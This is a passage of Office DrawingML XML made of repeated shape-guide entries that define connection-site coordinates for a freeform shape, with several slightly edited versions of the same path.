              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1009015 h 1911077"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 944996 h 1911077"/>
              <a:gd name="connsiteX19" fmla="*/ 3045184 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 931964 h 1911077"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 796952 h 1911077"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 361507 h 1911077"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 283919 h 1911077"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 172477 h 1911077"/>
              <a:gd name="connsiteX24" fmla="*/ 8930218 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 36279 h 1911077"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 53168 h 1911077"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 52923 h 1911077"/>
              <a:gd name="connsiteX0" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 52923 h 1911077"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 1911077 h 1911077"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 1911077 h 1911077"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 1887003 h 1911077"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 1873906 h 1911077"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 1798845 h 1911077"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 1758966 h 1911077"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 1749104 h 1911077"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 1702606 h 1911077"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1651818 h 1911077"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1501775 h 1911077"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1379948 h 1911077"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1317395 h 1911077"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1270299 h 1911077"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1211319 h 1911077"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1129200 h 1911077"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1064945 h 1911077"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1009015 h 1911077"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 944996 h 1911077"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 796952 h 1911077"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 796952 h 1911077"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 361507 h 1911077"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 283919 h 1911077"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 172477 h 1911077"/>
              <a:gd name="connsiteX24" fmla="*/ 8930218 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 36279 h 1911077"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 53168 h 1911077"/>
              <a:gd name="connsiteX26" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 52923 h 1911077"/>
              <a:gd name="connsiteX0" fmla="*/ 9276097 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2300011"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2300011 h 2300011"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2300011 h 2300011"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2275937 h 2300011"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2262840 h 2300011"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2187779 h 2300011"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2147900 h 2300011"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2138038 h 2300011"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 2091540 h 2300011"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 2040752 h 2300011"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1890709 h 2300011"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1768882 h 2300011"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1706329 h 2300011"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1659233 h 2300011"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1600253 h 2300011"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1518134 h 2300011"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1453879 h 2300011"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1397949 h 2300011"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1333930 h 2300011"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1185886 h 2300011"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1185886 h 2300011"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 750441 h 2300011"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 672853 h 2300011"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 561411 h 2300011"/>
              <a:gd name="connsiteX24" fmla="*/ 8930218 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 425213 h 2300011"/>
              <a:gd name="connsiteX25" fmla="*/ 9287321 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 442102 h 2300011"/>
              <a:gd name="connsiteX26" fmla="*/ 9276097 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 2300011"/>
              <a:gd name="connsiteX0" fmla="*/ 9276097 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2300011"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2300011 h 2300011"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2300011 h 2300011"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2275937 h 2300011"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2262840 h 2300011"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2187779 h 2300011"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2147900 h 2300011"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2138038 h 2300011"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 2091540 h 2300011"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 2040752 h 2300011"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1890709 h 2300011"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1768882 h 2300011"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1706329 h 2300011"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1659233 h 2300011"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1600253 h 2300011"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1518134 h 2300011"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1453879 h 2300011"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1397949 h 2300011"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1333930 h 2300011"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1185886 h 2300011"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1185886 h 2300011"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 750441 h 2300011"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 672853 h 2300011"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 561411 h 2300011"/>
              <a:gd name="connsiteX24" fmla="*/ 8930218 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 425213 h 2300011"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 184352 h 2300011"/>
              <a:gd name="connsiteX26" fmla="*/ 9276097 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 2300011"/>
              <a:gd name="connsiteX0" fmla="*/ 9276097 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2300011"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2300011 h 2300011"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2300011 h 2300011"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2275937 h 2300011"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2262840 h 2300011"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2187779 h 2300011"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2147900 h 2300011"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2138038 h 2300011"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 2091540 h 2300011"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 2040752 h 2300011"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1890709 h 2300011"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1768882 h 2300011"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1706329 h 2300011"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1659233 h 2300011"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1600253 h 2300011"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1518134 h 2300011"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1453879 h 2300011"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1397949 h 2300011"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1333930 h 2300011"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1185886 h 2300011"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1185886 h 2300011"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 750441 h 2300011"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 672853 h 2300011"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 561411 h 2300011"/>
              <a:gd name="connsiteX24" fmla="*/ 8905671 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 270590 h 2300011"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 184352 h 2300011"/>
              <a:gd name="connsiteX26" fmla="*/ 9276097 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 2300011"/>
              <a:gd name="connsiteX0" fmla="*/ 9276097 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2300011"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2300011 h 2300011"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2300011 h 2300011"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2275937 h 2300011"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2262840 h 2300011"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2187779 h 2300011"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2147900 h 2300011"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2138038 h 2300011"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 2091540 h 2300011"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 2040752 h 2300011"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1890709 h 2300011"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1768882 h 2300011"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1706329 h 2300011"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1659233 h 2300011"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1600253 h 2300011"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1518134 h 2300011"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1453879 h 2300011"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1397949 h 2300011"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1333930 h 2300011"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1185886 h 2300011"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1185886 h 2300011"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 750441 h 2300011"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 672853 h 2300011"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 307388 h 2300011"/>
              <a:gd name="connsiteX24" fmla="*/ 8905671 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 270590 h 2300011"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 184352 h 2300011"/>
              <a:gd name="connsiteX26" fmla="*/ 9276097 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 2300011"/>
              <a:gd name="connsiteX0" fmla="*/ 9280823 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2227722"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2227722 h 2227722"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2227722 h 2227722"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2203648 h 2227722"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2190551 h 2227722"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2115490 h 2227722"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2075611 h 2227722"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2065749 h 2227722"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 2019251 h 2227722"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1968463 h 2227722"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1818420 h 2227722"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1696593 h 2227722"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1634040 h 2227722"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1586944 h 2227722"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1527964 h 2227722"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1445845 h 2227722"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1381590 h 2227722"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1325660 h 2227722"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1261641 h 2227722"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1113597 h 2227722"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1113597 h 2227722"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 678152 h 2227722"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 600564 h 2227722"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 235099 h 2227722"/>
              <a:gd name="connsiteX24" fmla="*/ 8905671 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 198301 h 2227722"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 112063 h 2227722"/>
              <a:gd name="connsiteX26" fmla="*/ 9280823 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 2227722"/>
              <a:gd name="connsiteX0" fmla="*/ 9280823 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 9459 h 2237181"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2237181 h 2237181"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2237181 h 2237181"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2213107 h 2237181"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2200010 h 2237181"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2124949 h 2237181"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2085070 h 2237181"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2075208 h 2237181"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 2028710 h 2237181"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1977922 h 2237181"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1827879 h 2237181"/>
              <a:gd name="connsiteX11" fmla="*/ 1700002 w 9288370"/>
              <a:gd name="connsiteY11" fmla="*/ 1706052 h 2237181"/>
              <a:gd name="connsiteX12" fmla="*/ 1925247 w 9288370"/>
              <a:gd name="connsiteY12" fmla="*/ 1643499 h 2237181"/>
              <a:gd name="connsiteX13" fmla="*/ 2056727 w 9288370"/>
              <a:gd name="connsiteY13" fmla="*/ 1596403 h 2237181"/>
              <a:gd name="connsiteX14" fmla="*/ 2281913 w 9288370"/>
              <a:gd name="connsiteY14" fmla="*/ 1537423 h 2237181"/>
              <a:gd name="connsiteX15" fmla="*/ 2402058 w 9288370"/>
              <a:gd name="connsiteY15" fmla="*/ 1455304 h 2237181"/>
              <a:gd name="connsiteX16" fmla="*/ 2522221 w 9288370"/>
              <a:gd name="connsiteY16" fmla="*/ 1391049 h 2237181"/>
              <a:gd name="connsiteX17" fmla="*/ 2689698 w 9288370"/>
              <a:gd name="connsiteY17" fmla="*/ 1335119 h 2237181"/>
              <a:gd name="connsiteX18" fmla="*/ 3001703 w 9288370"/>
              <a:gd name="connsiteY18" fmla="*/ 1271100 h 2237181"/>
              <a:gd name="connsiteX19" fmla="*/ 3437947 w 9288370"/>
              <a:gd name="connsiteY19" fmla="*/ 1123056 h 2237181"/>
              <a:gd name="connsiteX20" fmla="*/ 4209051 w 9288370"/>
              <a:gd name="connsiteY20" fmla="*/ 1123056 h 2237181"/>
              <a:gd name="connsiteX21" fmla="*/ 7197317 w 9288370"/>
              <a:gd name="connsiteY21" fmla="*/ 687611 h 2237181"/>
              <a:gd name="connsiteX22" fmla="*/ 7995116 w 9288370"/>
              <a:gd name="connsiteY22" fmla="*/ 610023 h 2237181"/>
              <a:gd name="connsiteX23" fmla="*/ 8545846 w 9288370"/>
              <a:gd name="connsiteY23" fmla="*/ 244558 h 2237181"/>
              <a:gd name="connsiteX24" fmla="*/ 8905671 w 9288370"/>
              <a:gd name="connsiteY24" fmla="*/ 207760 h 2237181"/>
              <a:gd name="connsiteX25" fmla="*/ 9090939 w 9288370"/>
              <a:gd name="connsiteY25" fmla="*/ 121522 h 2237181"/>
              <a:gd name="connsiteX26" fmla="*/ 9280823 w 9288370"/>
              <a:gd name="connsiteY26" fmla="*/ 9459 h 2237181"/>
              <a:gd name="connsiteX0" fmla="*/ 9285549 w 9288370"/>
              <a:gd name="connsiteY0" fmla="*/ 11350 h 2213558"/>
              <a:gd name="connsiteX1" fmla="*/ 9288370 w 9288370"/>
              <a:gd name="connsiteY1" fmla="*/ 2213558 h 2213558"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 9288370"/>
              <a:gd name="connsiteY2" fmla="*/ 2213558 h 2213558"/>
              <a:gd name="connsiteX3" fmla="*/ 55380 w 9288370"/>
              <a:gd name="connsiteY3" fmla="*/ 2189484 h 2213558"/>
              <a:gd name="connsiteX4" fmla="*/ 106098 w 9288370"/>
              <a:gd name="connsiteY4" fmla="*/ 2176387 h 2213558"/>
              <a:gd name="connsiteX5" fmla="*/ 370723 w 9288370"/>
              <a:gd name="connsiteY5" fmla="*/ 2101326 h 2213558"/>
              <a:gd name="connsiteX6" fmla="*/ 461604 w 9288370"/>
              <a:gd name="connsiteY6" fmla="*/ 2061447 h 2213558"/>
              <a:gd name="connsiteX7" fmla="*/ 671860 w 9288370"/>
              <a:gd name="connsiteY7" fmla="*/ 2051585 h 2213558"/>
              <a:gd name="connsiteX8" fmla="*/ 859506 w 9288370"/>
              <a:gd name="connsiteY8" fmla="*/ 2005087 h 2213558"/>
              <a:gd name="connsiteX9" fmla="*/ 1056432 w 9288370"/>
              <a:gd name="connsiteY9" fmla="*/ 1954299 h 2213558"/>
              <a:gd name="connsiteX10" fmla="*/ 1336276 w 9288370"/>
              <a:gd name="connsiteY10" fmla="*/ 1804256 h 2213558"/>
